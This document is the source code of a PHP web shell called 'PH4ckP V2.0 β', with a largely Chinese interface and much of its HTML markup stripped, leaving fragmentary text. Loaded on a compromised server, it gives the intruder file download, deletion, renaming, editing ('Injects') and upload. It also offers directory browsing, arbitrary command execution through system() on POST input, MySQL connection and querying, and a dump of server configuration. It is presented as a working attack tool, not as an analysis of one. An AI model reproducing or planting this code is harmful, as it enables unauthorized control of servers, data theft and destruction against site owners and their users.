if
($downfile) {@set_time_limit(600);
$filename = basename($downfile);
$filesize = filesize($downfile);
header("Content-Type: application/force-download;
name=".$filename);
header("Content-Transfer-Encoding: binary");
header("Content-Length: $filesize");
header("Content-Disposition: attachment;
filename=".$filename);
header("Expires: 0");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
readfile("$downfile");
exit();
}
if($delfile!=""){
if(is_file($delfile)){
$message = (@unlink($delfile))
? "The deletion document succeeds!`$delfile` Already
deleted!"
: "The deletion document is defeated!`$delfile` The document
exists!" ;
}else{
$message = "File `$delfile` does not exist!";
}
}
echo $message;
if ($refilename){
echo
'
echo '
method="post">';
echo '
';
echo '
';echo '
';echo '';
echo 'Enter the newname to here:';
echo '
name="newname"/>';
echo '
value="Rename"/>';
echo '
';echo'';echo
'
';$oldname=basename($refilename);
if (@rename($oldname,$_POST['newname'])){
echo
'';}
else
{ if
(!empty($_POST['newname']))
echo
'';}
}
if ($editfile) {
echo
'
echo
'
method="post">';
echo
'';
echo
'
';$content=basename($editfile);
$fp=@fopen("$content","a+");
$data=@fread($fp,filesize($content));
echo
'
';echo
'
>';
echo
$data;
if
(!empty($_POST['newcontent']))
{echo
$result=$result=@fwrite($fp,$_POST['newcontent'])?"The
injection document succeeds!Good Luck!":"The injection document is
defeated!";
}
}
echo
'
';?>
PH4ckP V2.0 β Bypr0cess
body {font-family: "sans-serif", "serif"; font-size: 12px;}
BODY { background-color:#A2B5CD }
a:link {color: #BFEFFF; text-decoration: none}
a:visited {color: #080808; text-decoration: none}
a:hover {color: #FFFFFF; text-decoration: underline}
input {font-family: "sans-serif", "serif";font-size: 12px;}
td {font-family: "sans-serif", "Verdana"; font-size: 12px;}
.title {font-family: "Verdana", "Tahoma";font-size:
20px;font-weight: bold; color=black}
align="center">PH4ckP V2.0 β |
action="=$PHP_SELF?>"
method="get">
Operatingsystem:<?echo
PHP_OS;?>
Servername:<?echo
$_SERVER['SERVER_NAME'];?>
ServerIP:<?echo
gethostbyname($_SERVER['SERVER_NAME']);?>
Servertime:<?echo date("Y年m月d日
h:i:s",time());?>
Serverport :<?echo
$_SERVER['SERVER_PORT'];?>
href=http://translate.google.com/translate_t>Click
here to translate online
href="?shell=env">『PHP探针模块』 | href="?shell=checkdir">『目录浏览模块[快速]』 | href="?shell=command">『命令执行模块』 | href="?shell=sql">『数据库操作模块』 | href="?shell=change">『字符转换模块』 |
/table>
Current dir of contents:<?php if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo " color=\"#00688B\">".$dir." ";} else { $dir=$_GET['dir']; echo " color=\"#00688B\">".$dir." ";} ?> |
method="post"> UploadFile: style="font-family:Verdana,Arial; font-size: 9pt;"> style="font-family:Verdana,Arial; font-size: 9pt;background-color:#A2B5CD"> //文件上传 $upload_file=$_FILES['upload_file']['tmp_name']; $upload_file_name=$_FILES['upload_file']['name']; if($upload_file){ $file_size_max = 1000*1000; $store_dir = "__FILE__"; $accept_overwrite = 1; if ($upload_file_size > $file_size_max) { echo "兄弟!换个小点滴!!"; exit; } if (file_exists($store_dir . $upload_file_name) && !$accept_overwrite) { Echo "文件已存在!"; exit; } if (!move_uploaded_file($upload_file,$upload_file_name)) { echo "上传文件失败!"; exit; } } Echo " Uploaded file:"; echo $_FILES['upload_file']['name']; Echo "Uploadfilesiza:"; echo $_FILES['upload_file']['size']/1024; $Erroe=$_FILES['upload_file']['error']; switch($Erroe){ case 0: Echo "Loading..."; break; case 1: Echo "上传的文件超过限制!"; break; case 2: Echo "上传文件的大小超过限制!"; break; } echo ' |
echo '';
echo '
';?>
echo '
cellpadding="3">';
echo '
method="get">';
echo '
';echo
'
';echo "The dir of contents glances over:";
echo '
style="font-family:Verdana,Arial; font-size:
9pt;">';
echo '
style="font-family:Verdana,Arial; font-size:
9pt;background-color:#A2B5CD ">';
echo
'
';echo
'
';echo '
';echo '
cellspacing="1">';
echo '
';echo
'
';echo"Sub-Dir of contents";echo
'
';echo '
';$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="1"){
if($file!=".."&&$file!=".") {
echo "
\n";echo "
href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">$file
\n";echo "
\n";} else {
if($file=="..")
echo "
href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Back
higher authority dir of
contents
";}
}
}
@closedir($dirs);
?>
cellspacing="1">
Filename Filedate Filesize Fileoperates$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
$size=@filesize("$dir/$file")/1024;
$lastsave=@date("Y-n-d
H:i:s",filectime("$dir/$file"));
echo
"
\n";echo
"
$file\n";echo "
$lastsave\n";echo
"
$sizeKB
\n";echo "
href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">[Down]
href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode
($file)."\">[Delete]
href=\"?refilename=".urlencode($dir)."/".urlencode($file)."\">
[Rename]
href=\"?editfile=".urlencode($dir)."/".urlencode($file)."\">[Injects]
\n";echo
"
\n";}
}
@closedir($dirs);
?>
function dir_wriable($dir){
$xY7_test=tempnam("$dir","test_file");
if ($fp=@fopen($xY7_test,"w")){
@fclose($fp);
@unlink($xY7_test);
$wriable="ture";
}
else {
$wriable=false or die ("Cannot open $xY7_test!");
}
return $wriable;
}
if (dir_wriable(str_replace('//','/',dirname(__FILE__)))){
$dir_wriable='目录可写';
echo
"当前目录可写!^ _
^";
}
else{
$dir_wriable='目录不可写';
echo
"当前目录不可写!";
}
function getinfo($xy7)
{
if($xy7==1)
{
$s='
color=blue>YES√
';}
else
{
$s='
color=red>NO×
';}
return $s;
} echo
'
';
echo '
';
echo "服务器系统:" ;
echo PHP_OS;
echo '
';
echo "服务器域名:";
echo $_SERVER['SERVER_NAME'];
echo '
';
echo "WEB服务器端口:";
echo $_SERVER['SERVER_PORT'];
echo '
';
echo "服务器时间:";
echo date("Y年m月d日 h:i:s",time());
echo '
';
echo "服务器IP地址:";
echo
gethostbyname($_SERVER['SERVER_NAME']);
echo '
';
echo "服务器操作系统文字编码:";
echo $_SERVER['HTTP_ACCEPT_LANGUAGE'];
echo '
';
echo "服务器解释引擎:";
echo $_SERVER['SERVER_SOFTWARE'];
echo '
';
echo "PHP运行方式:";
echo strtoupper(php_sapi_name());
echo '
';
echo "PHP版本:";
echo PHP_VERSION;
echo '
';
echo "ZEND版本:";
echo zend_version();
echo '
';
echo "本文件绝对路径:";
echo __FILE__;
echo '
';
echo "服务器剩余空间:";
echo intval(diskfreespace(".") / (1024 *
1024)).'MB';
echo '
';
echo "脚本运行可占最大内存:";
echo get_cfg_var("memory_limit");
echo '
';
echo "脚本上传文件大小限制:";
echo get_cfg_var("upload_max_filesize");
echo '
';
echo "被屏蔽函数:";
echo get_cfg_var("disable_functions");
echo '
';
echo "POST方法提交限制:";
echo get_cfg_var("post_max_size");
echo '
';
echo "脚本超时时间:";
echo
get_cfg_var("max_execution_time")."秒";
echo '
';
echo "动态链接库:";
echo getinfo(get_cfg_var("enable_dl"));
echo '
';
echo "自定义全局变量:";
echo
getinfo(get_cfg_var("register_globals"));
echo '
';
echo "显示错误信息:";
echo
getinfo(get_cfg_var("display_errors"));
echo '
';
echo "PHP安全模式:";
echo getinfo(get_cfg_var("safe_mode"));
echo '
';
echo "FTP文件传输:";
echo getinfo(get_magic_quotes_gpc("FTP
support"));
echo '
';
echo"允许使用URL打开文件:";
echo
getinfo(get_cfg_var("allow_url_fopen"));
echo '
';
echo "SESSION支持:";
echo
getinfo(function_exists("session_start"));
echo '
';
echo "Socket支持:";
echo
getinfo(function_exists("fsockopen"));
echo '
';
echo "MYSQL数据库:";
echo
getinfo(function_exists("mysql_close"));
echo '
';
echo "SQL SERVER数据库:";
echo
getinfo(function_exists("mssql_close"));
echo '
';
echo "ODBC数据库:";
echo
getinfo(function_exists("odbc_close"));
echo '
';
echo "Oracle数据库:";
echo
getinfo(function_exists("ora_close"));
echo '
';
echo "SNMP协议:";
echo getinfo(function_exists("snmpget"));
echo '
';
echo '
';
}
elseif ($_GET['shell']=="checkdir"){
global $PHP_SELF;
echo '
method="post">';
echo "快速目录浏览:";
echo '
name="dir" style="font-family:Verdana,Arial; font-size:
9pt;"/>';
echo '
value="GoTo" style="font-family:Verdana,Arial; font-size: 9pt;
background-color:#A2B5CD"/>';
echo '
';
echo '
cols="70" rows="15">';
if (empty($_POST['dir']))
$newdir="./";
else
$newdir=$_POST['dir'];
$handle=@opendir($newdir);
echo "handle: $handle\n";
while ($file=@readdir($handle))
{echo
("$file \n");}
echo
'
';echo '
';
$nowdir=dirname($PHP_SELF);
}
elseif ($_GET['shell']=="command"){
echo '
echo '
method="post">';
echo '
';
echo '
';echo '
';echo 'Enter your command:';
echo '
style="font-family:Verdana,Arial; font-size:
9pt;"/>';
echo '
style="font-family:Verdana,Arial; font-size:
9pt;background-color:#A2B5CD"/>';
echo '
';echo'';
echo '
';echo '
';echo '
readonly>';
@system($_POST['cmd']);
echo
'
';}
elseif ($_GET['shell']=="change"){
echo '
method="post">';
echo '
';
echo "Enter binary character:";
echo '
style="font-family:Verdana,Arial; font-size:
9pt;"/>';
echo '';
echo '
';echo '
readonly>';
$result=bin2hex($_POST['char']);
echo "0x".$result;
echo
'
';}
elseif ($_GET['shell']=="sql"){
echo '
cellSpacing=8 cellPadding=4>';
echo
'
';echo '
method="post">';
echo "Host:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo
'
';echo "Username:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo
'
';echo
'
';echo "Password:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo
'
';echo "DBname:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo '
value="Connect" style="font-family:Verdana,Arial; font-size: 9pt;
background-color:#A2B5CD"/>';
echo
'
';if
(@mysql_connect($servername,$username,$password) and
@mysql_select_db($dbname)) {
echo "The database connects successfully!";
mysql_close();
} else {
echo mysql_error();
}
if (!empty($dbresult)){
$dbresult = @mysql_query($_POST['query']);
echo ($result) ? "Requests successfully!" : "The request makes a
mistake: ".mysql_error();
mysql_close();}
echo
'
';echo '
rows="10">';
echo '
';echo
'
';echo '
align="center">';
echo '';
echo
'
';echo '
';}
?>
align="center">
Copyright (C) 2006 All Rights
Reserved